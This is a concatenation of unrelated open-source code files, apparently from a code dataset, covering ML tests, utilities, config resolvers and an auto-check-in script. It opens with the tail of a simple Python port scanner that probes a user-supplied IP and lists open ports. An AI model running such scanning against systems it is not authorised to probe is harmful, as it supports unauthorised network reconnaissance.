open_ports = []
for port in portlist:
if check_port(ip, port) == 0:
open_ports.append(port)
return open_ports
def main():
open_ports = []
ip = str(input("Please enter the scanned IP address: "))
start_time = time.time()
open_ports = scan(ip)
dur = round((time.time() - start_time), 2)
num = len(open_ports)
print(f"""\n
Scan Results for {ip}
{num} ports are open.
Scan lasted {dur} seconds.
------------------------------------\n""")
for port in open_ports:
portval = portlist[port]
print(f"""{port} ---- {portval}\n""")
print("------------------------------------\n")
if __name__ == "__main__":
main()
|
bugtests/test339c.py | jeff5/jython-whinchat | 577 | 11186696 | import java
import test339c
class spam(java.lang.Object):
pass
class eggs1(spam):
pass
class eggs2(test339c.spam):
pass
|
utils/misc.py | yihui-he2020/epipolar-transformers | 360 | 11186697 | import errno
import os
def mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def prefix_dict(d, prefix):
return {'/'.join([prefix, k]): v for k, v in d.items()}
|
tests/openbb_terminal/core/log/generation/test_settings.py | tehcoderer/GamestonkTerminal | 255 | 11186738 | <gh_stars>100-1000
from openbb_terminal.core.log.generation.settings import (
AppSettings,
AWSSettings,
LogSettings,
Settings,
)
def test_aws_settings():
aws_access_key_id = "MOCK_AWS_ACCESS_KEY_ID"
aws_secret_access_key = "MOCK_AWS_SECRET_ACCESS_KEY"
aws_settings = AWSSettings(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
assert aws_settings.aws_access_key_id == aws_access_key_id
assert aws_settings.aws_secret_access_key == aws_secret_access_key
def test_app_settings():
name = "MOCK_NAME"
commit_hash = "MOCK_COMMIT_HASH"
session_id = "MOCK_SESSION_ID"
identifier = "MOCK_IDENTIFIER"
app_settings = AppSettings(
name=name,
commit_hash=commit_hash,
session_id=session_id,
identifier=identifier,
)
assert app_settings.name == name
assert app_settings.commit_hash == commit_hash
assert app_settings.session_id == session_id
assert app_settings.identifier == identifier
def test_log_settings(tmp_path):
directory = tmp_path
frequency = "MOCK_FREQUENCY"
handler_list = "MOCK_HANDLER_LIST"
rolling_clock = "MOCK_ROLLING_CLOCK"
verbosity = 20
log_settings = LogSettings(
directory=directory,
frequency=frequency,
handler_list=handler_list,
rolling_clock=rolling_clock,
verbosity=verbosity,
)
assert log_settings.directory == directory
assert log_settings.frequency == frequency
assert log_settings.handler_list == handler_list
assert log_settings.rolling_clock == rolling_clock
assert log_settings.verbosity == verbosity
def test_settings(tmp_path):
directory = tmp_path
frequency = "MOCK_FREQUENCY"
handler_list = "MOCK_HANDLER_LIST"
rolling_clock = "MOCK_ROLLING_CLOCK"
verbosity = 20
log_settings = LogSettings(
directory=directory,
frequency=frequency,
handler_list=handler_list,
rolling_clock=rolling_clock,
verbosity=verbosity,
)
name = "MOCK_NAME"
commit_hash = "MOCK_COMMIT_HASH"
session_id = "MOCK_SESSION_ID"
identifier = "MOCK_IDENTIFIER"
app_settings = AppSettings(
name=name,
commit_hash=commit_hash,
session_id=session_id,
identifier=identifier,
)
aws_access_key_id = "MOCK_AWS_ACCESS_KEY_ID"
aws_secret_access_key = "MOCK_AWS_SECRET_ACCESS_KEY"
aws_settings = AWSSettings(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
settings = Settings(
app_settings=app_settings,
aws_settings=aws_settings,
log_settings=log_settings,
)
assert settings.app_settings != app_settings
assert settings.aws_settings != aws_settings
assert settings.log_settings != log_settings
assert isinstance(settings.app_settings, AppSettings)
assert isinstance(settings.aws_settings, AWSSettings)
assert isinstance(settings.log_settings, LogSettings)
|
pcdet/models/roi_heads/__init__.py | s-ryosky/ST3D | 184 | 11186749 | <gh_stars>100-1000
from .roi_head_template import RoIHeadTemplate
from .partA2_head import PartA2FCHead
from .pvrcnn_head import PVRCNNHead
from .second_head import SECONDHead
__all__ = {
'RoIHeadTemplate': RoIHeadTemplate,
'PartA2FCHead': PartA2FCHead,
'PVRCNNHead': PVRCNNHead,
'SECONDHead': SECONDHead
}
|
scenic/projects/fast_vit/tests/test_model_utils.py | techthiyanes/scenic | 688 | 11186750 | <filename>scenic/projects/fast_vit/tests/test_model_utils.py
"""Tests for model_utils.py."""
import functools
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import random
import jax.numpy as jnp
import numpy as np
from scenic.projects.fast_vit import model_utils
class AttentionLayersTest(parameterized.TestCase):
"""Tests for modules in model_utils.py."""
def test_linformer_encoder_self_attention(self):
"""Tests EncoderSelfAttention."""
rng = random.PRNGKey(0)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.LinformerEncoderAttention, num_heads=n_heads)
encoder_vars = encoder_self_attention_def().init(rng, x, deterministic=True)
y = encoder_self_attention_def().apply(encoder_vars, x, deterministic=True)
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
def test_linformer_encoder_self_attention_w_dropout(self):
"""Tests EncoderSelfAttention with dropout."""
rng = random.PRNGKey(0)
rng, dropout_rng = random.split(rng)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.LinformerEncoderAttention,
num_heads=n_heads,
dropout_rate=0.1)
encoder_vars = encoder_self_attention_def().init(rng, x, deterministic=True)
y = encoder_self_attention_def().apply(
encoder_vars, x, deterministic=False, rngs={'dropout': dropout_rng})
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
@parameterized.named_parameters([
('test_softmax', 'softmax'),
('test_generalized', 'generalized'),
])
def test_performer_encoder_self_attention(self, attention_fn_cls):
"""Tests PerformerEncoderAttention."""
rng = random.PRNGKey(0)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.PerformerEncoderAttention,
num_heads=n_heads,
attention_fn_cls=attention_fn_cls)
encoder_vars = encoder_self_attention_def().init(
rng, x, x, deterministic=True)
y = encoder_self_attention_def().apply(
encoder_vars, x, x, deterministic=True)
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
@parameterized.named_parameters([
('test_softmax', 'softmax'),
('test_generalized', 'generalized'),
])
def test_performer_encoder_self_attention_w_dropout(self, attention_fn_cls):
"""Tests PerformerEncoderAttention with dropout."""
rng = random.PRNGKey(0)
rng, dropout_rng = random.split(rng)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.PerformerEncoderAttention,
num_heads=n_heads,
attention_fn_cls=attention_fn_cls)
encoder_vars = encoder_self_attention_def().init(
rng, x, x, deterministic=True)
y = encoder_self_attention_def().apply(
encoder_vars, x, x, deterministic=False, rngs={'dropout': dropout_rng})
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
@parameterized.named_parameters([('test_axi1', 1), ('test_axi2', 2)])
def test_axial_reshaping_utils(self, axis):
"""Tests fo get_axial_1d_input and get_axial_2d_input."""
input_shape = (4, 8, 16, 32) # Shape = `[bs, h, w, c]`
inputs_2d = jnp.array(np.random.normal(size=input_shape))
inputs_1d = model_utils.get_axial_1d_input(inputs_2d, axis=axis)
inputs_back_to_2d = model_utils.get_axial_2d_input(
inputs_1d, axis=axis, two_d_shape=input_shape)
self.assertTrue(jnp.array_equal(inputs_2d, inputs_back_to_2d))
class TopKTokenSelectorTest(parameterized.TestCase):
"""Tests for token selector module."""
@parameterized.named_parameters([
('pool_unselected', True, False, False, 6),
('only_selected', False, False, False, 5),
('pool_unselected_exclude_cls', True, True, False, 7),
('only_selected_exclude_cls', False, True, False, 6),
('pool_unselected_sample', True, False, True, 6),
('only_selected_sample', False, False, True, 5),
('pool_unselected_exclude_cls_sample', True, True, True, 7),
('only_selected_exclude_cls_sample', False, True, True, 6),
])
def test_top_k_selector(self,
pool_unselected_tokens,
exclude_cls,
sample_tokens,
expected_output_len):
"""Tests Top-K selector."""
rng, sample_rng = random.split(random.PRNGKey(0))
x = jnp.ones((4, 16, 32))
top_k = 5
top_selector = functools.partial(
model_utils.TopKTokenSelector,
top_k=top_k,
sample_tokens=sample_tokens,
pool_unselected_tokens=pool_unselected_tokens,
exclude_cls=exclude_cls,
)
variable = top_selector().init(rng, x, train=False)
y = top_selector().apply(
variable, x, train=True, rngs={'dropout': sample_rng})
# Test outputs shape.
expected_shape = (4, expected_output_len, 32)
self.assertEqual(y.shape, expected_shape)
@parameterized.named_parameters([
('replacement',
(32, 6, 10), 7, True, (32, 6, 7), False, False, False),
('replacement_nonunique',
(32, 6, 10), 11, None, (32, 6, 11), False, False, True),
('no_replacement',
(32, 6, 10), 10, False, (32, 6, 10), False, True, False),
('no_replacement_raises',
(32, 6, 10), 11, False, None, True, None, None),
])
def test_sample_categorial(self,
logit_shape,
num_samples,
replacement,
expected_shape,
expected_raise,
expected_unique,
expeted_nonunique):
"""Test categorial sampler."""
rng, sample_rng = random.split(random.PRNGKey(0))
logits = random.normal(rng, logit_shape)
kwargs = {}
if replacement is not None:
kwargs['replacement'] = replacement
if expected_raise:
with self.assertRaises(ValueError):
samples = model_utils.sample_categorical(
sample_rng, logits, num_samples, **kwargs)
else:
samples = model_utils.sample_categorical(
sample_rng, logits, num_samples, **kwargs)
self.assertEqual(samples.shape, expected_shape)
if expected_unique or expeted_nonunique:
samples = jnp.reshape(samples, (-1, expected_shape[-1]))
samples = jax.device_get(samples)
for sample in samples:
if expected_unique:
self.assertEqual(len(set(sample.tolist())), len(sample))
if expeted_nonunique:
self.assertLess(len(set(sample.tolist())), len(sample))
if __name__ == '__main__':
absltest.main()
|
smzdm/smzdm/smzdm/smzdm.py | jinzaizhichi/ledesoft | 1,491 | 11186784 | # coding: utf-8
import urllib
import urllib2
import re
import pdb
import os
import cookielib
import StringIO
import ConfigParser
class Smzdm:
def __init__(self):
self.cookies = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookies))
self.headers = {
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
'Referer' : 'http://www.smzdm.com/',
'Origin' : 'http://www.smzdm.com/'
}
# 登录
def login(self, account):
url = "https://zhiyou.smzdm.com/user/login/ajax_check"
data = urllib.urlencode({
'username' : account['username'],
'password' : account['password'],
'rememberme' : 'on',
'redirect_url' : 'http://www.smzdm.com'
})
request = urllib2.Request(url, headers = self.headers, data = data)
content = self.opener.open(request)
return content
# 退出
def logout(self):
url = "http://zhiyou.smzdm.com/user/logout"
request = urllib2.Request(url, headers = self.headers)
self.opener.open(request)
# 签到
def checkin(self):
url = "http://zhiyou.smzdm.com/user/checkin/jsonp_checkin"
request = urllib2.Request(url, headers = self.headers)
self.opener.open(request)
# 查看是否签到
def is_checkin(self):
url = "http://zhiyou.smzdm.com/user/info/jsonp_get_current?"
request = urllib2.Request(url, headers = self.headers)
response = self.opener.open(request)
content = response.read()
pattern = re.compile('\"has_checkin\"\:(.*?),')
item = re.search(pattern, content)
if item and item.group(1).strip() == 'true':
os.system(' var=`date "+%Y-%m-%d %H:%M:%S"`;echo "${var} 自动签到成功" > /koolshare/smzdm/log')
else:
os.system(' var=`date "+%Y-%m-%d %H:%M:%S"`;echo "${var} 自动签到出错" > /koolshare/smzdm/log')
def start_checkin(self):
parser = ConfigParser.RawConfigParser()
parser.read("/koolshare/smzdm/account.ini")
for user in parser.sections():
account = {}
account['username'] = parser.get(user, 'username')
account['password'] = parser.get(user, 'password')
self.login(account)
self.checkin()
self.is_checkin()
self.logout()
smzdm = Smzdm()
smzdm.start_checkin()
|
corehq/ex-submodules/pillowtop/management/commands/update_es_settings.py | dimagilg/commcare-hq | 471 | 11186834 | <reponame>dimagilg/commcare-hq<filename>corehq/ex-submodules/pillowtop/management/commands/update_es_settings.py
from django.core.management.base import BaseCommand, CommandError
from corehq.elastic import get_es_new
from corehq.pillows.utils import get_all_expected_es_indices
class Command(BaseCommand):
help = "Update dynamic settings for existing elasticsearch indices."
def add_arguments(self, parser):
parser.add_argument(
'--noinput',
action='store_true',
dest='noinput',
default=False,
help='Skip important confirmation warnings.'
)
def handle(self, **options):
noinput = options.pop('noinput')
es_indices = list(get_all_expected_es_indices())
to_update = []
es = get_es_new()
for index_info in es_indices:
old_settings = es.indices.get_settings(index=index_info.index)
old_number_of_replicas = int(
old_settings[index_info.index]['settings']['index']['number_of_replicas']
)
new_number_of_replicas = index_info.meta['settings']['number_of_replicas']
if old_number_of_replicas != new_number_of_replicas:
print("{} [{}]:\n Number of replicas changing from {!r} to {!r}".format(
index_info.alias, index_info.index, old_number_of_replicas, new_number_of_replicas))
to_update.append((index_info, {
'number_of_replicas': new_number_of_replicas,
}))
if not to_update:
print("There is nothing to update.")
return
if (noinput or _confirm(
"Confirm that you want to update all the settings above?")):
for index_info, settings in to_update:
mapping_res = es.indices.put_settings(index=index_info.index, body=settings)
if mapping_res.get('acknowledged', False):
print("{} [{}]:\n Index settings successfully updated".format(
index_info.alias, index_info.index))
else:
print(mapping_res)
def _confirm(message):
if input(
'{} [y/n]'.format(message)
).lower() == 'y':
return True
else:
raise CommandError('abort')
|
SSR-Net/data/TYY_IMDBWIKI_create_db.py | bleakie/MaskInsightface | 269 | 11186869 | <reponame>bleakie/MaskInsightface
import numpy as np
import cv2
import os
import csv
import argparse
from tqdm import tqdm
from TYY_utils import get_meta
def get_args():
parser = argparse.ArgumentParser(description="This script cleans-up noisy labels "
"and creates database for training.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--output", "-o", type=str, default='/home/sai/YANG/datasets/face_datasets/wiki/',
help="path to output database mat file")
parser.add_argument("--input", type=str, default="/home/sai/YANG/datasets/face_datasets/wiki/gender_age_bbox_crop/",
help="dataset; wiki or imdb")
parser.add_argument("--img_size", type=int, default=112,
help="output image size")
parser.add_argument("--min_score", type=float, default=1.0,
help="minimum face_score")
parser.add_argument("--label", type=str, default='/home/sai/YANG/datasets/face_datasets/wiki/label.csv',
help="path to output database mat file")
args = parser.parse_args()
return args
def main_gender_age():
args = get_args()
labelList = csv.reader(open(args.label, "rt", encoding="utf-8-sig"))
out_ages = []
out_imgs = []
out_genders = []
for row in labelList:
true_age = row[2]
true_gender = row[1]
img_id = row[0]
img_path = os.path.join(args.input, img_id)
img = cv2.imread(img_path)
if img is None:
continue
out_genders.append(int(true_gender))
out_ages.append(int(true_age))
out_imgs.append(cv2.resize(img, (args.img_size, args.img_size)))
print('len:', len(out_imgs))
np.savez('train_data/wiki_bbox_crop.npz',image=np.array(out_imgs), gender=np.array(out_genders), age=np.array(out_ages), img_size=args.img_size)
def main_csv():
args = get_args()
output_path = args.output
db = args.input
min_score = args.min_score
mat_path = os.path.join(db, "{}.mat".format('wiki'))
full_path, dob, gender, photo_taken, face_score, second_face_score, age = get_meta(mat_path, 'wiki')
output_data = []
for i in tqdm(range(len(face_score))):
if face_score[i] < min_score:
continue
if (~np.isnan(second_face_score[i])) and second_face_score[i] > 0.0:
continue
if ~(0 <= age[i] <= 100):
continue
if np.isnan(gender[i]):
continue
img_id = str(full_path[i][0])
save_path = os.path.join(output_path, img_id.split('/')[1])
img_path = os.path.join(db, str(full_path[i][0]))
import shutil
shutil.copy(img_path, save_path)
output_data.append({'gender':gender[i], 'age':age[i], 'id': img_id.split('/')[1]})
with open(args.label, 'w') as f:
headers = ['id', 'gender', 'age']
f_scv = csv.DictWriter(f, headers)
f_scv.writeheader()
f_scv.writerows(np.array(output_data))
if __name__ == '__main__':
main_gender_age()
|
mlens/index/temporal.py | mehrdad-shokri/mlens | 760 | 11186872 | <filename>mlens/index/temporal.py<gh_stars>100-1000
"""ML-ENSEMBLE
:author: <NAME>
:copyright: 2017-2018
:licence: MIT
Temporal (time series) indexing.
"""
from __future__ import division
from numbers import Integral
import numpy as np
from .base import BaseIndex
from ._checks import check_temporal_index
class TemporalIndex(BaseIndex):
"""Indexer that generates time series fold over ``X``.
Sequential iterator that generates fold index tuples that preserve
time series structure of data. Consequently, test folds always contain
"future" observations (i.e. higher index values).
The generator returns a tuple of stop and start positions to be used
for numpy array slicing [stop:start].
.. versionadded:: 0.2.3
Parameters
----------
step_size : int (default=1)
number of samples to use in each test fold. The final window
size may be smaller if too few observations remain.
burn_in : int (default=None)
number of samples to use for first training fold. These observations
will be dropped from the output. Defaults to ``step_size``.
window: int (default=None)
number of previous samples to use in each training fold, except first
which is determined by ``burn_in``. If ``None``, will use all previous
observations.
lag: int (default=0)
distance between the most recent training point in the training fold and
the first test point. For ``lag>0``, the training fold and the test fold
will not be contiguous.
X : array-like of shape [n_samples,] , optional
the training set to partition. The training label array is also,
accepted, as only the first dimension is used. If ``X`` is not
passed at instantiating, the ``fit`` method must be called before
``generate``, or ``X`` must be passed as an argument of
``generate``.
raise_on_exception : bool (default=True)
whether to warn on suspicious slices or raise an error.
See Also
--------
:class:`FoldIndex`, :class:`BlendIndex`, :class:`SubsetIndex`
Examples
--------
>>> import numpy as np
>>> from mlens.index import TemporalIndex
>>> X = np.arange(10)
>>> print("Data set: %r" % X)
>>> print()
>>>
>>> idx = TemporalIndex(2, X=X)
>>>
>>> for train, test in idx.generate(as_array=True):
... print('TRAIN IDX: %32r | TEST IDX: %16r' % (train, test))
>>>
>>> print()
>>>
>>> for train, test in idx.generate(as_array=True):
... print('TRAIN SET: %32r | TEST SET: %16r' % (X[train], X[test]))
>>>
>>> for train_idx, test_idx in idx.generate(as_array=True):
... assert max(train_idx) <= min(test_idx)
>>>
>>> print()
>>>
>>> print("No overlap between train set and test set.")
Data set: array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
TRAIN IDX: array([0, 1]) | TEST IDX: array([2, 3, 4, 5, 6, 7, 8, 9])
TRAIN IDX: array([0, 1, 2, 3]) | TEST IDX: array([4, 5, 6, 7, 8, 9])
TRAIN IDX: array([0, 1, 2, 3, 4, 5]) | TEST IDX: array([6, 7, 8, 9])
TRAIN IDX: array([0, 1, 2, 3, 4, 5, 6, 7]) | TEST IDX: array([8, 9])
TRAIN SET: array([0, 1]) | TEST SET: array([2, 3, 4, 5, 6, 7, 8, 9])
TRAIN SET: array([0, 1, 2, 3]) | TEST SET: array([4, 5, 6, 7, 8, 9])
TRAIN SET: array([0, 1, 2, 3, 4, 5]) | TEST SET: array([6, 7, 8, 9])
TRAIN SET: array([0, 1, 2, 3, 4, 5, 6, 7]) | TEST SET: array([8, 9])
No overlap between train set and test set.
"""
def __init__(self, step_size=1, burn_in=None, window=None, lag=0, X=None, raise_on_exception=True):
super(TemporalIndex, self).__init__()
self.step_size = step_size
self.burn_in = burn_in if burn_in is not None else step_size
self.window = window
self.lag = lag
self.raise_on_exception = raise_on_exception
if X is not None:
self.fit(X)
def fit(self, X, y=None, job=None):
"""Method for storing array data.
Parameters
----------
X : array-like of shape [n_samples, optional]
array to _collect dimension data from.
y : None
for compatibility
job : None
for compatibility
Returns
-------
instance :
indexer with stores sample size data.
"""
self.n_samples = X.shape[0]
check_temporal_index(
self.burn_in, self.step_size, self.window,
self.lag, self.n_samples, self.raise_on_exception)
self.n_test_samples = self.n_samples - self.burn_in
self.__fitted__ = True
return self
def _gen_indices(self):
"""Generate Time series folds"""
idx = self.burn_in
stop = False
burn_in = True
while not stop:
train_stop = idx - self.lag
if burn_in:
train_start = 0
burn_in = False
elif self.window is None:
train_start = 0
else:
train_start = max(idx - self.window - self.lag, 0)
test_start = idx
test_stop = min(idx + self.step_size, self.n_samples)
train_index = (train_start, train_stop)
test_index = (test_start, test_stop)
yield train_index, test_index
idx += self.step_size
if idx >= self.n_samples:
stop = True
|
test/python/algorithms/evolvers/test_evolution_result.py | ikkoham/qiskit-core | 1,456 | 11186884 | <gh_stars>1000+
# This code is part of Qiskit.
#
# (C) Copyright IBM 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Class for testing evolution result."""
import unittest
from test.python.algorithms import QiskitAlgorithmsTestCase
from qiskit.algorithms.evolvers.evolution_result import EvolutionResult
from qiskit.opflow import Zero
class TestEvolutionResult(QiskitAlgorithmsTestCase):
"""Class for testing evolution result and relevant metadata."""
def test_init_state(self):
"""Tests that a class is initialized correctly with an evolved_state."""
evolved_state = Zero
evo_result = EvolutionResult(evolved_state=evolved_state)
expected_state = Zero
expected_aux_ops_evaluated = None
self.assertEqual(evo_result.evolved_state, expected_state)
self.assertEqual(evo_result.aux_ops_evaluated, expected_aux_ops_evaluated)
def test_init_observable(self):
"""Tests that a class is initialized correctly with an evolved_observable."""
evolved_state = Zero
evolved_aux_ops_evaluated = [(5j, 5j), (1.0, 8j), (5 + 1j, 6 + 1j)]
evo_result = EvolutionResult(evolved_state, evolved_aux_ops_evaluated)
expected_state = Zero
expected_aux_ops_evaluated = [(5j, 5j), (1.0, 8j), (5 + 1j, 6 + 1j)]
self.assertEqual(evo_result.evolved_state, expected_state)
self.assertEqual(evo_result.aux_ops_evaluated, expected_aux_ops_evaluated)
if __name__ == "__main__":
unittest.main()
|
PyObjCTest/test_nsindexset.py | Khan/pyobjc-framework-Cocoa | 132 | 11186895 | <gh_stars>100-1000
from PyObjCTools.TestSupport import *
from Foundation import *
class TestNSIndexSet (TestCase):
def testMethods(self):
self.assertResultIsBOOL(NSIndexSet.isEqualToIndexSet_)
self.assertResultIsBOOL(NSIndexSet.containsIndex_)
self.assertResultIsBOOL(NSIndexSet.containsIndexesInRange_)
self.assertResultIsBOOL(NSIndexSet.containsIndexes_)
self.assertResultIsBOOL(NSIndexSet.intersectsIndexesInRange_)
self.assertArgIsOut(NSIndexSet.getIndexes_maxCount_inIndexRange_, 0)
self.assertArgSizeInArg(NSIndexSet.getIndexes_maxCount_inIndexRange_, 0, 1)
self.assertArgSizeInResult(NSIndexSet.getIndexes_maxCount_inIndexRange_, 0)
@min_os_level('10.6')
def testMethods10_6(self):
self.assertArgIsBlock(NSIndexSet.enumerateIndexesUsingBlock_, 0,
b'v' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.enumerateIndexesWithOptions_usingBlock_, 1,
b'v' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgHasType(NSIndexSet.enumerateIndexesInRange_options_usingBlock_, 0, NSRange.__typestr__)
self.assertArgIsBlock(NSIndexSet.enumerateIndexesInRange_options_usingBlock_, 2,
b'v' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.indexPassingTest_, 0,
objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.indexWithOptions_passingTest_, 1,
objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgHasType(NSIndexSet.indexInRange_options_passingTest_, 0, NSRange.__typestr__)
self.assertArgIsBlock(NSIndexSet.indexInRange_options_passingTest_, 2,
objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.indexesPassingTest_, 0,
objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.indexesWithOptions_passingTest_, 1,
objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
self.assertArgHasType(NSIndexSet.indexesInRange_options_passingTest_, 0, NSRange.__typestr__)
self.assertArgIsBlock(NSIndexSet.indexesInRange_options_passingTest_, 2,
objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
@min_os_level('10.7')
def testMethod10_7(self):
self.assertArgIsBlock(NSIndexSet.enumerateRangesUsingBlock_, 0,
b'v' + NSRange.__typestr__ + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.enumerateRangesWithOptions_usingBlock_, 1,
b'v' + NSRange.__typestr__ + b'o^' + objc._C_NSBOOL)
self.assertArgIsBlock(NSIndexSet.enumerateRangesInRange_options_usingBlock_, 2,
b'v' + NSRange.__typestr__ + b'o^' + objc._C_NSBOOL)
if __name__ == "__main__":
main()
|
hooks/gin_config_hook_builder.py | slowy07/tensor2robot | 456 | 11186902 | # coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Builds hooks that write out the operative gin configuration.
"""
from typing import List
from absl import logging
import gin
from tensor2robot.hooks import hook_builder
from tensor2robot.models import model_interface
import tensorflow as tf
@gin.configurable
class GinConfigLoggerHook(tf.estimator.SessionRunHook):
"""A SessionRunHook that logs the operative config to stdout."""
def __init__(self, only_once=True):
self._only_once = only_once
self._written_at_least_once = False
def after_create_session(self, session=None, coord=None):
"""Logs Gin's operative config."""
if self._only_once and self._written_at_least_once:
return
logging.info('Gin operative configuration:')
for gin_config_line in gin.operative_config_str().splitlines():
logging.info(gin_config_line)
self._written_at_least_once = True
@gin.configurable
class OperativeGinConfigLoggerHookBuilder(hook_builder.HookBuilder):
def create_hooks(
self,
t2r_model,
estimator,
):
return [GinConfigLoggerHook()]
|
examples/PyObjC/ICSharingWatcher/TableModelAppDelegate.py | flupke/py2app | 193 | 11186934 | <reponame>flupke/py2app
import os
from Cocoa import *
import objc
import leases
FILENAME = '/var/db/dhcpd_leases'
def getLeases(fn):
if os.path.exists(fn):
lines = file(fn, 'U')
else:
lines = leases.EXAMPLE.splitlines()
return list(leases.leases(lines))
class TableModelAppDelegate (NSObject):
mainWindow = objc.IBOutlet()
def awakeFromNib(self):
self.timer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(1.0, self, 'pollLeases:', {}, True)
def pollLeases_(self, timer):
if not os.path.exists(FILENAME):
return
d = timer.userInfo()
newtime = os.stat(FILENAME).st_mtime
oldtime = d.get('st_mtime', 0)
if newtime > oldtime:
d['st_mtime'] = newtime
self.setLeases_(getLeases(FILENAME))
def leases(self):
if not hasattr(self, '_cachedleases'):
self._cachedleases = getLeases(FILENAME)
return self._cachedleases
def setLeases_(self, leases):
self._cachedleases = leases
def windowWillClose_(self, sender):
if sender is self.mainWindow:
NSApp().terminate()
|
zentral/conf/config.py | janheise/zentral | 634 | 11186939 | <reponame>janheise/zentral
import base64
import itertools
import json
import logging
import os
import re
import time
from .buckets import get_bucket_client
from .params import get_param_client
from .secrets import get_secret_client
logger = logging.getLogger("zentral.conf.config")
class Proxy:
pass
class EnvProxy(Proxy):
def __init__(self, name):
self._name = name
def get(self):
return os.environ[self._name]
class ResolverMethodProxy(Proxy):
def __init__(self, resolver, proxy_type, key):
if proxy_type == "file":
self._method = resolver.get_file_content
elif proxy_type == "param":
self._method = resolver.get_parameter_value
elif proxy_type == "secret":
self._method = resolver.get_secret_value
elif proxy_type == "bucket_file":
self._method = resolver.get_bucket_file
else:
raise ValueError("Unknown proxy type %s", proxy_type)
self._key = key
def get(self):
return self._method(self._key)
class JSONDecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return json.loads(self._child_proxy.get())
class Base64DecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return base64.b64decode(self._child_proxy.get())
class ElementFilter(Proxy):
def __init__(self, key, child_proxy):
try:
self._key = int(key)
except ValueError:
self._key = key
self._child_proxy = child_proxy
def get(self):
return self._child_proxy.get()[self._key]
class Resolver:
def __init__(self):
self._cache = {}
self._bucket_client = None
self._param_client = None
self._secret_client = None
def _get_or_create_cached_value(self, key, getter, ttl=None):
# happy path
try:
expiry, value = self._cache[key]
except KeyError:
pass
else:
if expiry is None or time.time() < expiry:
logger.debug("Key %s from cache", key)
return value
logger.debug("Cache for key %s has expired", key)
# get value
value = getter()
if ttl:
expiry = time.time() + ttl
else:
expiry = None
self._cache[key] = (expiry, value)
logger.debug("Set cache for key %s", key)
return value
def get_file_content(self, filepath):
cache_key = ("FILE", filepath)
def getter():
with open(filepath, "r") as f:
return f.read()
return self._get_or_create_cached_value(cache_key, getter)
def get_secret_value(self, name):
cache_key = ("SECRET", name)
if not self._secret_client:
self._secret_client = get_secret_client()
def getter():
return self._secret_client.get(name)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
def get_bucket_file(self, key):
cache_key = ("BUCKET_FILE", key)
if not self._bucket_client:
self._bucket_client = get_bucket_client()
def getter():
return self._bucket_client.download_to_tmpfile(key)
return self._get_or_create_cached_value(cache_key, getter)
def get_parameter_value(self, key):
cache_key = ("PARAM", key)
if not self._param_client:
self._param_client = get_param_client()
def getter():
return self._param_client.get(key)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
class BaseConfig:
PROXY_VAR_RE = re.compile(
r"^\{\{\s*"
r"(?P<type>bucket_file|env|file|param|secret)\:(?P<key>[^\}\|]+)"
r"(?P<filters>(\s*\|\s*(jsondecode|base64decode|element:[a-zA-Z_\-/0-9]+))*)"
r"\s*\}\}$"
)
custom_classes = {}
def __init__(self, path=None, resolver=None):
self._path = path or ()
if not resolver:
resolver = Resolver()
self._resolver = resolver
def _make_proxy(self, key, match):
proxy_type = match.group("type")
key = match.group("key").strip()
if proxy_type == "env":
proxy = EnvProxy(key)
else:
proxy = ResolverMethodProxy(self._resolver, proxy_type, key)
filters = [f for f in [rf.strip() for rf in match.group("filters").split("|")] if f]
